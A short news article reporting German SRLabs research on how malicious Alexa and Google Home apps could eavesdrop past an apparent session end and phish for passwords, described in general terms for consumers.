Alexa, Google Home can become privacy and security threats
A German research group confirm hackers can use spy and steak information using Alexa or Google Home smart speakers.
Most modern homes now rely on smart products that can be controlled by devices such as the Amazon Echo and Google Home. These smart-enabled gadgets interact with users via voice commands with the help of virtual assistants unique to each platform. However, it appears that researchers have stumbled upon a common workaround that can allow hackers to spy on unsuspecting users. This exploit allegedly keeps malicious apps running in the background even if it seems like the user deactivated the session.
This reminds consumers to always be vigilant and never share confidential information over the internet. Moreover, privacy is also at risk as those with ill intent can keep the microphones active for a longer period of time and listen in to conversations. According to an article from Bleeping Computer, this is possible due to how the smart speakers work. Developers can tweak the codes to bypass deactivation even after trigger phrase has been invoked.
This was reportedly demonstrated by SRLabs after it affixed a Unicode character sequence right after the closing message of the app. From the user's end, it will appear that the Alexa or Google Home smart speaker already terminated the action or skill after the confirmation playback. Meanwhile, the string of code that follows cannot be pronounced by the system and the speaker will stay silent.
This means people can still listen in while the machine attempts to read out the code until the end. To extend this, hackers just need to add more Unicode character sequences, which can practically be whatever length they require. So far the only workaround for this threat is for the manufacturers to extensively review each app submitted for approval.
In addition to spying on Alexa and Google Home users, hackers can likewise include a phishing message in between the codes. Although most people are aware that Google or Amazon will never ask for passwords this way, there is still a possibility that someone can mistake it for a genuine request. Whatever the user says thereafter will be recorded as text and forwarded to the developer's servers.
The German research group is asking Amazon and Google to look into removing the Unicode characters the smart speakers cannot read out in the first place.
© Copyright IBTimes 2024. All rights reserved.